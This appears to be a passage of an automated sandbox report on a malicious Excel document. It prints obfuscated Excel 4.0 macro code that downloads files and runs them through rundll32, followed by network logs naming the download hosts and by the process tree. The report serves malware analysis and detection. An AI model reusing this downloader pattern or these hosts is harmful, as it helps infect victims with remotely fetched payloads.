                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                      Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                                                                                                      General
                                                                                                                                                      Stream Path:Book
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                      Stream Size:363283
                                                                                                                                                      Entropy:3.24522262131
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                      Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                                                                                                      
                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                      "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                                                                                                      "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      May 12, 2021 12:44:46.316456079 CEST49716443192.168.2.6192.185.39.58
                                                                                                                                                      May 12, 2021 12:44:46.474916935 CEST44349716192.185.39.58192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:46.475095034 CEST49716443192.168.2.6192.185.39.58
                                                                                                                                                      May 12, 2021 12:44:46.476066113 CEST49716443192.168.2.6192.185.39.58
                                                                                                                                                      May 12, 2021 12:44:46.634386063 CEST44349716192.185.39.58192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:46.638175011 CEST44349716192.185.39.58192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:46.638199091 CEST44349716192.185.39.58192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:46.638211012 CEST44349716192.185.39.58192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:46.638281107 CEST49716443192.168.2.6192.185.39.58
                                                                                                                                                      May 12, 2021 12:44:46.654664993 CEST49716443192.168.2.6192.185.39.58
                                                                                                                                                      May 12, 2021 12:44:46.852906942 CEST44349716192.185.39.58192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:46.853050947 CEST49716443192.168.2.6192.185.39.58
                                                                                                                                                      May 12, 2021 12:44:46.853904963 CEST49716443192.168.2.6192.185.39.58
                                                                                                                                                      May 12, 2021 12:44:47.052561045 CEST44349716192.185.39.58192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.052829027 CEST44349716192.185.39.58192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.052928925 CEST49716443192.168.2.6192.185.39.58
                                                                                                                                                      May 12, 2021 12:44:47.053153992 CEST49716443192.168.2.6192.185.39.58
                                                                                                                                                      May 12, 2021 12:44:47.053258896 CEST44349716192.185.39.58192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.053344011 CEST49716443192.168.2.6192.185.39.58
                                                                                                                                                      May 12, 2021 12:44:47.132565975 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:47.211364985 CEST44349716192.185.39.58192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.290901899 CEST44349718192.185.32.232192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.291033030 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:47.291563988 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:47.449702978 CEST44349718192.185.32.232192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.455018997 CEST44349718192.185.32.232192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.455040932 CEST44349718192.185.32.232192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.455056906 CEST44349718192.185.32.232192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.455118895 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:47.455184937 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:47.465003967 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:47.623920918 CEST44349718192.185.32.232192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.624044895 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:47.624785900 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:47.824232101 CEST44349718192.185.32.232192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:48.207611084 CEST44349718192.185.32.232192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:48.207792044 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:48.207849979 CEST44349718192.185.32.232192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:48.207920074 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:48.208959103 CEST49718443192.168.2.6192.185.32.232
                                                                                                                                                      May 12, 2021 12:44:48.367919922 CEST44349718192.185.32.232192.168.2.6

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      May 12, 2021 12:44:24.263200998 CEST6379153192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:24.314917088 CEST53637918.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:25.050570965 CEST6426753192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:25.102034092 CEST53642678.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:25.159260988 CEST4944853192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:25.217367887 CEST53494488.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:28.317363977 CEST6034253192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:28.369586945 CEST53603428.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:29.611494064 CEST6134653192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:29.660176039 CEST53613468.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:30.735481977 CEST5177453192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:30.784148932 CEST53517748.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:32.285633087 CEST5602353192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:32.337326050 CEST53560238.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:39.538434982 CEST5838453192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:39.597692013 CEST53583848.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:40.846893072 CEST6026153192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:40.919538975 CEST53602618.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:41.027426958 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:41.079509020 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:41.348287106 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:41.419614077 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:42.352653980 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:42.424568892 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:43.455909014 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:43.513050079 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:45.464402914 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:45.522991896 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:45.920775890 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:45.969679117 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:46.253247976 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:46.313551903 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.015094995 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:47.063780069 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:47.071569920 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:47.129045010 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:49.573952913 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:49.631375074 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:52.449340105 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:52.498203039 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:53.276541948 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:53.328140974 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:54.122028112 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:54.173603058 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:55.400471926 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:55.452194929 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:56.815799952 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:56.867192984 CEST53633078.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:57.634916067 CEST4969453192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:57.683451891 CEST53496948.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:58.476036072 CEST5498253192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:58.524842024 CEST53549828.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:44:58.625479937 CEST5001053192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:44:58.698782921 CEST53500108.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:45:18.614808083 CEST6371853192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:45:18.676827908 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:45:34.949121952 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:45:35.952476978 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:45:36.968313932 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:45:36.970478058 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:45:36.971956968 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:45:37.030227900 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:45:38.484458923 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:45:38.557985067 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:04.007652044 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:04.069338083 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:04.262099028 CEST6220853192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:04.330178022 CEST53622088.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:26.039551973 CEST5757453192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:26.183321953 CEST53575748.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:26.995901108 CEST5181853192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:27.053250074 CEST53518188.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:27.611654997 CEST5662853192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:27.762397051 CEST53566288.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:28.175860882 CEST6077853192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:28.224622965 CEST53607788.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:28.737785101 CEST5379953192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:28.798374891 CEST53537998.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:28.825838089 CEST5468353192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:28.899080038 CEST53546838.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:29.353830099 CEST5932953192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:29.617561102 CEST53593298.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:30.070131063 CEST6402153192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:30.130465031 CEST53640218.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:31.049885988 CEST5612953192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:31.110047102 CEST53561298.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:32.009926081 CEST5817753192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:32.070034027 CEST53581778.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:32.501122952 CEST5070053192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:32.558192015 CEST53507008.8.8.8192.168.2.6
                                                                                                                                                      May 12, 2021 12:46:50.557670116 CEST5406953192.168.2.68.8.8.8
                                                                                                                                                      May 12, 2021 12:46:50.630111933 CEST53540698.8.8.8192.168.2.6

                                                                                                                                                      ICMP Packets

                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                      May 12, 2021 12:45:36.972040892 CEST192.168.2.68.8.8.8d0fd(Port unreachable)Destination Unreachable

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      May 12, 2021 12:44:46.253247976 CEST192.168.2.68.8.8.80xe65aStandard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                                                                                                      May 12, 2021 12:44:47.071569920 CEST192.168.2.68.8.8.80xe5fStandard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      May 12, 2021 12:44:46.313551903 CEST8.8.8.8192.168.2.60xe65aNo error (0)signifysystem.com192.185.39.58A (IP address)IN (0x0001)
                                                                                                                                                      May 12, 2021 12:44:47.129045010 CEST8.8.8.8192.168.2.60xe5fNo error (0)fcventasyservicios.cl192.185.32.232A (IP address)IN (0x0001)
                                                                                                                                                      May 12, 2021 12:45:36.970478058 CEST8.8.8.8192.168.2.60x66b3No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                      May 12, 2021 12:45:36.971956968 CEST8.8.8.8192.168.2.60x66b3No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                      May 12, 2021 12:45:37.030227900 CEST8.8.8.8192.168.2.60x66b3No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                      HTTPS Packets

                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                      May 12, 2021 12:44:46.638211012 CEST192.185.39.58443192.168.2.649716CN=cpcontacts.signifysystem.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Apr 01 17:00:25 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Wed Jun 30 17:00:25 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                      May 12, 2021 12:44:47.455056906 CEST192.185.32.232443192.168.2.649718CN=mail.fcventasyservicios.cl CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Mar 16 13:01:12 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Jun 14 14:01:12 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:12:44:38
                                                                                                                                                      Start date:12/05/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x3f0000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:12:44:47
                                                                                                                                                      Start date:12/05/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:rundll32 ..\ritofm.cvm,DllRegisterServer
                                                                                                                                                      Imagebase:0x190000
                                                                                                                                                      File size:61952 bytes
                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:12:44:47
                                                                                                                                                      Start date:12/05/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                      Imagebase:0x190000
                                                                                                                                                      File size:61952 bytes
                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >